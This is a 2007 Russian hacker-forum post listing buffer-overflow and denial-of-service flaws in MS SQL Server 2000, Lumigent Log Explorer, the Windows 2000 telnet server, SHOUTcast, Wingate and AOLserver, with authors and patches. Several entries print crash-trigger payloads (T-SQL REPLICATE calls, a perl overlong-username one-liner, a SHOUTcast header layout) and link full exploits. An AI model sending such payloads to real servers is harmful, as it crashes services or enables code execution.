Показать сообщение отдельно

DoS для WIN часть 2
  #22  
Старый 07.10.2007, 01:42
#84mb.akuMa
Новичок
Регистрация: 14.09.2007
Сообщений: 13
Провел на форуме:
63188

Репутация: 25
По умолчанию DoS для WIN часть 2

DoS для MS SQL сервера

Переполнение буфера в Microsoft SQL Server 2000.

MS SQL сервер содержит две недокументированные функции кодирования пароля, pwdencrypt и pwdcompare. В одной из этих функций, pwdencrypt(), обнаружено переполнение буфера: SELECT pwdencrypt(REPLICATE('A',353)). Для успешного выполнения уязвимости атакующий должен получить непривилегированный доступ к базе данных. Подробности тут: http://securitylab.ru/?ID=31472

Автор: Martin Rakhmanoff (jimmers) jimmers@yandex.ru

Система: Microsoft SQL Server 2000 (up to SP2).

Патч: поставить сервис пак 3

Переполнение буфера в Lumigent Log Explorer

Lumigent Log Explorer - эксплорер журнала транзакций для Microsoft SQL Server 7/2000. Программа поставляется с дополнительными сохраненными процедурами, хранящимися в p_logattach.dll. Некоторые их этих процедур уязвимы к удаленному переполнению буфера и потенциально к выполнению произвольного кода.

Пример:

declare @bo varchar(8000)

set @bo = replicate('A', 800)

exec xp_logattach_StartProf @bo

declare @bo varchar(8000)

set @bo = replicate('A',800)

exec xp_logattach_setport @bo

declare @bo varchar(8000)

set @bo = replicate('A',800)

exec xp_logattach @bo


Система: Lumigent Log Explorer version 3

Патч: мелкософт молчит, а спецы советуют давать доступ к журналу только проверенным людям

DoS в Microsoft SQL Server 2000

В Microsoft SQL Server 2000 обнаружено годное для удаленного использования переполнение буфера в функции OpenDataSource в комбинации с MS Jet Engine. Так как проблема связана с Jet Engine, другие программы, использующие Jet, также могут быть уязвимы. Создавая специально обработанный SQL запрос, используя функцию OpenDataSource, можно вызвать переполнение буфера в процессе SQL Server, получая удаленный контроль за выполнением процесса. Любой код будет выполнен с системными привилегиями. Так как переполнение связанно с Unicode кодированием, оно очень просто в эксплуатации. Уязвимость может использоваться через Web сервер, уязвимый к внедрению SQL кода. Нехитрый эксплоит (http://securitylab.ru/?ID=31578), создает файл SQL-ODSJET-BO на диске "с:".

Автор: David Litchfield (david@ngssoftware.com)

Система: Microsoft SQL Server 2000 sp0-sp2

Патч: сервис пак 3

DoS ПОНЕМНОЖКУ

Переполнение буфера в telnet сервере Microsoft

Microsoft поставляет Telnet-сервер с несколькими программами. Реализация этого сервера в Windows 2000 и Interix 2.2 содержит переполнение буфера в коде, который обрабатывает обработку опций telnet-протокола. Уязвимость позволяет нападающему выполнять произвольный код с системными правами. DoS происходит, если буфер, в который заносится имя пользователя при входе в систему, превышает 4300 знаков, и посылаемый код содержит 127(0x7b, backspace). Это приведет к краху сервера с ошибкой 0x41414141. Проверить на багу можно с помощью двух строчек:

perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}'

telnet victimbox


Автор: Система: Windows 2000 и Interix 2.2

SHOUTcast

SHOUTcast - Winamp-основанная система потокового аудио от Nullsoft (или, по-простому, инет-радио), которая содержит переполнение буфера, а также уязвимость защиты, которая позволяет злоумышленникам разрушить сервер, посылая ему семь длинных запросов, длиной около 4 Кб каждый, внутри HTTP-запроса. Уязвимость позволяет получить полный доступ к бажной системе. Нападавший должен знать DJ пароль, чтобы осуществить эту уязвимость. Это ограничивает воздействие уязвимости, однако, если, например, shoutcast-сервер выполняется как корень, DJ может получить привилегии корня. Переполнение происходит при посылке следующих данных 8001-му порту:

password\n

icy-name: netric

icy-[doesn't matter]: [buffer]


Ну а полный эксплоит валяется по адресу http://www.netric.org/exploits/mayday-linux.c для версии 1.8.9 и http://securitylab.ru/?ID=26236 для версии 1.8.2.

Автор: eSDee of Netric (www.netric.org)/FraMe (frame@hispalab.com)

Система: Nullsoft SHOUTcast 1.8.2/1.8.9

Патч: искать инфу на официальном сайте SHOUTcast'a в форуме техподдержки

DoS для Wingate

Wingate страдает от уязвимости защиты, которая позволяет отдаленным злоумышленникам вызывать DoS против машины, выполняющей Wingate 4.01. Программа не способна обработать большое количество подключений, которые посылают данные MSG_OOB. Эксплоит без труда можно найти, введя в браузер следующую шняжку:

http://securitylab.ru/?ID=26357

Автор: человек с ником god

Система: Wingate 4.01

Патч: апгрейд до следующей версии

Уязвимость в Aolserver 3.0

Aolserver 3.0 разрушается, если ему переслать длинную строку авторизации. Также, возможно, эта уязвимость позволяет хакеру выполнять произвольный код через переполнение буфера.

Эксплоит тута: http://securitylab.ru/?ID=26231.

Продолжение следует.